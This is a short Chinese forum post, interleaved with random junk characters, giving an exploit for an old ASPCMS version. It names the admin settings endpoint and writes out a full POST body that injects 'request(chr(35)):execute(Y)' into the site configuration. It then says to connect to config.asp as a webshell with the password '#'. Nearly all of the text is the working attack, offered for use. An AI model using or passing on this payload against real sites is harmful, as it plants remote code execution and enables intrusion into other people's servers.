老的ASPCMS版本的秒杀拿SHELL漏洞. C) r+ J& Q5 a* j
0 w# L9 ]0 H2 j/ f7 M8 J
找到后台。。。然后' a: D m* |8 r8 M% V. Q
" t3 [+ S, n7 ?' W' d" n1 N3 r
/admin/_system/AspCms_SiteSetting.asp?action=saves6 P6 r$ t; X( s7 k9 p5 ^6 G$ C
$ V0 r( b9 Y+ @+ I直接POST2 k i. z8 J7 l, |! u) z1 G) g3 q
0 ~; d, [4 s1 v KrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=14 v. s" k4 C: c! \
& O7 Q# U4 C, T* X: } r) o
再连接配置文件config.asp 密码为#* t+ C9 w4 n9 b' C4 ]
|